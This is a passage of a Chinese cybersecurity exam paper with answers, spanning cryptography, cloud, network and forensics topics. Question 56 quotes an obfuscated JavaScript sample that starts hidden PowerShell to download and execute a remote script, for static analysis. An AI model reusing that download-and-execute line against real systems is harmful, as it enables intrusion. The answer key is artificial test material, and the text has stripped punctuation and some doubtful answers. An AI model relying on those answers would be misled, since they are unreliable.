2025年网络安全技术考试试卷及答案

2025年网络安全技术考试试卷及答案一、单项选择题（每题1分，共20分。每题只有一个正确答案，请将正确选项字母填入括号内）1.在TLS1.3握手过程中，用于实现前向保密的核心机制是（）A.RSA密钥传输B.静态DH密钥交换C.ECDHE密钥交换D.PSKonly模式答案：C2.以下关于零信任架构（ZTA）的描述，错误的是（）A.默认信任内部网络流量B.以身份为访问控制核心C.动态评估访问请求风险D.依赖微分段技术答案：A3.在Linux系统中，若文件权限为“rwsrxrx”，则该文件的s位表示（）A.设置GIDB.设置UIDC.粘滞位D.不可变位答案：B4.针对SHA1的碰撞攻击首次公开演示的论文发表于（）A.2004年B.2012年C.2017年D.2020年答案：C5.在IPv6中，用于替代ARP的协议是（）A.NDPB.DHCPv6C.ICMPv6D.MLD答案：A6.以下哪项不是OWASPTop102021新增的风险类别（）A.服务端请求伪造B.失效的访问控制C.加密失败D.软件与数据完整性失效答案：B7.在Windows事件日志中，成功登录事件的ID为（）A.4624B.4625C.4672D.4688答案：A8.使用nmap扫描时，参数“sS”表示（）A.TCPSYN扫描B.TCPConnect扫描C.UDP扫描D.ACK扫描答案：A9.在公钥基础设施中，负责发布证书撤销列表（CRL）的实体是（）A.RAB.VAC.CAD.OCSPresponder答案：C10.以下关于Meltdown漏洞的描述，正确的是（）A.仅影响AMD处理器B.利用分支预测缺陷C.可绕过用户态与内核态隔离D.需利用缓存时序攻击答案：C11.在SQL注入防御中，最有效的编码规范是（）A.使用单引号转义B.使用存储过程C.参数化查询D.黑名单过滤答案：C12.以下哪项不属于国密算法（）A.SM2B.SM3C.SM4D.ChaCha20答案：D13.在Kubernetes中，用于限制容器CPU使用量的资源字段是（）A.requests.cpuB.limits.cpuC.maxSurgeD.revisionHistoryLimit答案：B14.当使用Wireshark捕获流量时，过滤表达式“tcp.flags.syn==1andtcp.flags.ack==0”表示（）A.SYNACK包B.纯SYN包C.FIN包D.RST包答案：B15.在BGP安全扩展中，用于验证AS路径的协议是（）A.RPKIB.BGPsecC.ASPAD.ROV答案：B16.以下关于Ransomware防御的叙述，错误的是（）A.离线备份可降低影响B.启用宏策略可阻止附件攻击C.应用白名单可限制payload执行D.网络分段可抑制横向移动答案：B17.在Android13中，限制应用访问剪贴板内容的权限是（）A.READ_CLIPBOARDB.CLIPBOARD_SERVICEC.READ_CLIPBOARD_SENSITIVED.无需权限即可访问答案：C18.使用GPG对称加密时，默认使用的加密算法是（）A.CAST5B.AES256C.TwofishD.Camellia答案：B19.在MITREATT&CK框架中，T1548.002代表（）A.进程注入B.UAC绕过C.令牌操纵D.计划任务答案：B20.以下关于DNSoverHTTPS（DoH）的争议点，不包括（）A.绕过企业安全策略B.增加CDN负载C.降低DNS缓存效率D.破坏本地域名解析答案：B二、多项选择题（每题2分，共20分。每题有两个或两个以上正确答案，多选、少选、错选均不得分）21.以下哪些属于国密SSL套件（）A.ECDHE_SM4_CBC_SM3B.RSA_SM4_GCM_SM3C.SM2_SM4_GCM_SM3D.TLS_AES_128_GCM_SHA256答案：A、C22.在Linux内核漏洞缓解技术中，可防御提权的有（）A.SMEPB.SMAPC.KASLRD.CFI答案：A、B、C、D23.以下关于WebAssembly（Wasm）安全模型的描述，正确的有（）A.线性内存与宿主隔离B.禁止直接访问DOMC.支持硬件内存保护键D.通过Capability进行系统调用答案：A、B24.在容器逃逸场景中，可能利用的载体包括（）A.恶意镜像B.特权容器C.挂载Docker.sockD.cgroupv1notify_on_release答案：A、B、C、D25.以下属于硬件安全模块（HSM）的典型接口标准（）A.PKCS11B.JCEC.MicrosoftCNGD.TASSL答案：A、B、C26.在5G核心网中，可引发用户面劫持的风险点有（）A.PFCP伪造B.GTPC欺骗C.SUPI明文广播D.SCTPINIT洪水答案：A、B27.以下关于同态加密（HE）的叙述，正确的有（）A.CKKS支持浮点近似计算B.BFV支持整数精确计算C.RSA属于部分同态D.GSW可实现全同态答案：A、B、C、D28.在Windows远程取证中，可获取易失性数据的工具有（）A.Volatility3B.RekallC.MagnetRAMCaptureD.FTKImager答案：A、B、C、D29.以下关于JSONWebToken（JWT）的安全加固措施，正确的有（）A.使用HS256时确保密钥长度≥256bitB.禁止alg设为noneC.添加exp与iat声明D.使用JWE加密敏感声明答案：A、B、C、D30.在工业控制系统（ICS）中，Modbus协议存在的安全风险包括（）A.缺乏认证B.功能码滥用C.明文传输D.会话复用答案：A、B、C三、填空题（每空1分，共20分）31.在TLS1.3中，用于加密握手消息的密钥称为______密钥。答案：ServerHandshakeTrafficSecret32.我国《个人信息保护法》自______年11月1日起施行。答案：202133.在Linux中，使用______命令可查看当前内核启用的seccomp过滤器。答案：seccomptoolsdump34.针对AES256的Biclique攻击，理论时间复杂度为______轮。答案：835.在WindowsDefender中，用于阻止无文件攻击的功能名称是______。答案：AttackSurfaceReduction（ASR）36.在Kubernetes网络策略中，默认的隔离行为是______。答案：Allowall（无策略时全放行）37.我国商用密码算法SM2基于的椭圆曲线名称为______。答案：SM2P256V138.在ARMv8.5A中，新增用于内存标记的扩展指令集缩写为______。答案：MTE39.在BGPhijack检测中，常用RPKI的ROA对象字段MaxLength表示______。答案：允许通告的最大前缀长度40.在Python沙箱逃逸中，通过______模块可获取内置__import__函数。答案：builtins41.在OAuth2.1中，已废除的隐式许可流英文为______。答案：ImplicitGrant42.在WiFi6中，用于防止暴力破解的同步认证机制缩写为______。答案：SAE（SimultaneousAuthenticationofEquals）43.在区块链中，以太坊EIP1559引入的交易费用机制称为______。答案：BaseFeeBurn44.在iOS16中，用于锁定后台敏感模式的框架名称是______。答案：LockdownMode45.在量子密钥分发中，BB84协议使用______个非正交基。答案：246.在Linux内核中，用于限制进程系统调用的安全模块缩写为______。答案：SECCOMP47.在Windows日志清除痕迹中，事件ID1102表示______日志被清除。答案：Security48.在HTTP/3中，传输层协议由TCP改为______。答案：QUIC49.在恶意软件分析中，通过______哈希可快速识别相似样本。答案：Imphash（导入表哈希）50.在GDPR中，对违法企业最高罚款可达全球年营业额______%。答案：4四、简答题（共30分）51.（封闭型，6分）简述TLS1.3与TLS1.2在握手延迟方面的差异，并给出具体往返时延（RTT）数值。答案：TLS1.2完整握手需2RTT：ClientHello→ServerHello/Certificate/ServerHelloDone→ClientKeyExchange/ChangeCipherSpec/Finished→ServerFinished。TLS1.3缩减为1RTT：ClientHello（含key_share）→ServerHello/EncryptedExtensions/Certificate/Finished→ClientFinished。若使用PSKwithEarlyData，可实现0RTT，但存在重放风险。52.（开放型，8分）结合实例说明如何在Kubernetes环境中利用OPAGatekeeper实施镜像签名验证，并阐述当签名无效时的阻断流程。答案：1)部署Gatekeeperv3.11，启用验证Webhook；2)安装Cosign签署镜像，例：cosignsignkeycosign.keynginx:1.25；3)编写ConstraintTemplate，类型为verifyimage，rego逻辑调用cosign.Verify()验证签名；4)创建Constraint，匹配namespace=prod，要求镜像签名需由指定公钥签发；5)当用户创建Pod引用未签名镜像时，Webhook返回403，事件描述“signatureverificationfailed”，Pod创建被kubeapiserver拒绝；6)审计日志记录Violation，Prometheusexporter统计阻断次数；7)若镜像升级后重新签名，Constraint自动放行，实现闭环。53.（封闭型，6分）列出我国等级保护2.0标准中对“安全区域边界”提出的四项控制点名称。答案：边界防护、访问控制、入侵防范、恶意代码防护。54.（开放型，10分）某企业采用混合云架构，本地AD与AzureAD通过ADFS联合。攻击者通过伪造SAML断言实现任意用户登录。请给出检测、响应与长期修复方案。答案：检测：1)在ADFS服务器启用详细审核日志，查找异常AuthnInstant与Issuer；2)使用AzureADSigninLogs筛选“SAMLresponseissuermismatch”事件；3)部署MicrosoftSentinel，配置AnalyticsRule“SAMLTokenIssuerAnomaly”，利用UEBA评分。响应：1)立即吊销ADFS令牌签名证书；2)阻断攻击者IP，禁用受影响账户；3)强制MFA重置；4)导出日志进行取证，确认断言伪造方式（证书泄露或算法绕过）。长期修复：1)轮换令牌签名证书，采用2048bitRSA并启用SHA256；2)启用ADFS2019的“RequiredSignedSAMLAssertion”与“EncryptSAMLAssertion”；3)部署条件访问策略，要求合规设备与风险评分低；4)将ADFS迁移至AzureADPHS（密码哈希同步）+PTA（直通认证），减少SAML攻击面；5)每季度执行红队演练，验证SAML安全。五、应用题（共60分）55.（计算类，15分）某Web系统采用PBKDF2HMACSHA256进行密码哈希，迭代次数t=12000，盐长度16字节，输出dkLen=32字节。假设GPU集群每秒可计算2^28次HMACSHA256，若用户密码空间为62^8（大小写+数字，长度8），求理论暴力破解所需时间（年），并评估将t提升至210000时的安全增益。答案：1)单次PBKDF2需t=12000次HMACSHA256；2)总计算量=62^8×12000≈2.18×10^14×1.2×10^4=2.62×10^18次；3)时间=2.62×10^18/2^28≈9.75×10^9秒≈309年；4)当t=210000，计算量增大17.5倍，时间≈309×17.5≈5408年，安全增益约17.5倍。56.（分析类，15分）给出一段疑似恶意JavaScript（见下），请静态分析其功能，并提取C2地址与持久化方式。代码：var_0x3da9=["\x77\x73\x63\x72\x69\x70\x74","\\..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","WindowStyleHiddenCommand\"&{(NewObjectNet.WebClient).DownloadString('hxxp://1:8080/mail/prev')|IEX}\""];require("child_process").exec(_0x3da9[1]+""+_0x3da9[2],()=>{});答案：1)功能：利用Node.jschild_process模块静默启动PowerShell，下载并执行远程脚本；2)C2地址：1:8080/mail/prev；3)持久化：代码片段本身无持久化，但攻击者可通过写入注册表Run键或计划任务实现，需结合后续payload分析。57.（综合类，30分）某集团公司计划建设“数据安全运营中心（DSOC）”，需覆盖数据分类分级、API审计、隐私计算、跨境传输评估、事件